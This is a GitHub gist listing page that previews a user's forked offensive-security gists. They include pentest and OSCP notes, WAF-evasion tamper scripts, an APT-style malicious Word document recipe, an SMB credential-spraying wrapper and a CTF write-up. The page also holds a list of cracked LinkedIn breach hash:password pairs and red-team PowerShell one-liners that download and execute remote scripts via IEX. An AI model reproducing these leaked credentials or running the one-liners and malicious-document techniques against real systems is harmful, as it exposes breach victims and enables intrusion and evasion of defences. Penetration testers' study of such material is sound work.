Skip to content

Instantly share code, notes, and snippets.

View secfb's full-sized avatar

Never Mind secfb

74 followers · 495 following
View GitHub Profile
@secfb
secfb / offsec.md
Created April 26, 2018 07:25 — forked from jivoi/offsec.md
Penetrating Testing/Assessment Workflow

Penetrating Testing/Assessment Workflow & other fun infosec stuff

https://github.com/jivoi/pentest

My feeble attempt to organize (in a somewhat logical fashion) the vast amount of information, tools, resources, tip and tricks surrounding penetration testing, vulnerability assessment, and information security as a whole*

@secfb
secfb / how-to-oscp-final.md
Created May 17, 2018 10:43 — forked from unfo/how-to-oscp-final.md

How to pass the OSCP

  1. Recon
  2. Find vuln
  3. Exploit
  4. Document it

Recon

Unicornscans in cli, nmap in msfconsole to help store loot in database.

@secfb
secfb / enum.sh
Created May 17, 2018 10:42 — forked from unfo/enum.sh
Linux priv esc. Might be out-dated script versions
#!/bin/bash
BLACK="\033[30m"
RED="\033[31m"
GREEN="\033[32m"
YELLOW="\033[33m"
BLUE="\033[34m"
PINK="\033[35m"
CYAN="\033[36m"
WHITE="\033[37m"
@secfb
secfb / sqlmap-tamper-scripts-evaluation.md
Created May 26, 2018 22:32 — forked from mgeeky/sqlmap-tamper-scripts-evaluation.md
SQLMap Tamper scripts evaluation against F5 Big-IP ASM WAF

SQLMap Tamper scripts evaluation against F5 Big-IP ASM WAF

The below table represents results of tests launched against F5 Big-IP ASM WAF appliance in it's XX version of YY and ZZ version of XY

Below names are to be passed to the --tamper= parameter of sqlmap.

The column Violation Rating represents most dominant rating of topmost 20 Requests observed by F5 in it's Security>>Event Logs:Application:Requests view.

The scale is 0-5.

@secfb
secfb / muti-stage-1.md
Created May 26, 2018 22:35 — forked from mgeeky/muti-stage-1.md
Multi-Stage Malicious Document creation process (ala APT)

Multi-Stage Penetration-Testing / Red Teaming Malicious Word document creation process

The below paper documents the process of creating a multi-stage IPS/AV transparent malicious document for purposes of Red Teaming / Penetration-Testing assignments.

The resulted document will be:

  • using OLE event autorun method
  • removing it's pretext shapes
  • Obtaining commands to be executed from document's Author property and passing them to StdIn of Powershell.exe process
  • Leveraging certutil technique to receive Base64 encoded malicious HTA document
  • Having Base64 encoded Powershell command in that Author property
@secfb
secfb / smb_cme_credspray.sh
Created May 28, 2018 12:04 — forked from ryan-wendel/smb_cme_credspray.sh
A wrapper around CrackMapExec to help prevent locking accounts when credential spraying SMB services.
#!/bin/bash
HOST="$1"
USERS="$2"
PASSWORDS="$3"
SLEEP="$4"
EMAIL="idrinkyourmilkshake@foobarbbq.com"
TEXT="7205551234@mms.att.net"
@secfb
secfb / CTFWRITE-Optimum-HTB.md
Created May 28, 2018 12:23 — forked from berzerk0/CTFWRITE-Optimum-HTB.md
CTF-Writeup: Optimum @ HackTheBox

This gist has been DEPRECATED.

The official version is found at https://berzerk0.github.io/GitPage/CTF-Writeups/Optimum-HTB.html

Updates will be reflected on GITPAGE VERSIONS ONLY

CTF Writeup: Optimum on HackTheBox

30 October 2017

Introduction

This was one of my first capture the flags, and the first HTB to go retired while I had a good enough grasp of it to do a write up. The steps are directed towards beginners, just like the box.

@secfb
secfb / windows-toolkit.md
Created December 28, 2018 11:49 — forked from jthuraisamy/windows-toolkit.md
Windows Toolkit

Windows Toolkit

Binary

Native Binaries

IDA Plugins Preferred Neutral Unreviewed
@secfb
secfb / Linkedin1.6MCrackedSHA1.txt
Last active February 27, 2019 22:15 — forked from alanhamlett/Linkedin1.6MCrackedSHA1.txt
This file has been truncated, but you can view the full file.
41b5f9baa448533dfd513f4ed1753990f59cc613:workingknowledge
deb7be5e7ca96c5b317b8a0ee13045a00e22bab5:rafaebiel
c528cf77d9cdb4ea14b43aa62cf55044e25d3b4e:kunsitint
0cbcf09868e2ec6b856eee76e7e6a9201cc60ed0:zxcasdQWE!@#
413b6507e26f3fbe388f4f5bc1f5599ff85dec1c:siapatakut
708c503230bb9a2079696386f891899a7fc15ba5:FM95jd01
400945c2ea0fa0179adb232c882fd9d8dec90424:100Senh@
e7880b9ae185f66fdfcc80d71e61154ce705f4ab:om2sanji
d819838e7f3a3d37fdc8dcb5c5cf9409d32bfbaf:bc89mod47a
12ba813567f950658c0151e9b4d2e3dcdccc8d25:fredandleo
@secfb
secfb / RedTeam_CheatSheet.ps1
Created May 19, 2019 13:44 — forked from m8sec/RedTeam_CheatSheet.ps1
Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Domain Recon
## ShareFinder - Look for shares on network and check access under current user context & Log to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"
## Import PowerView Module
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')"
## Invoke-BloodHound for domain recon
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"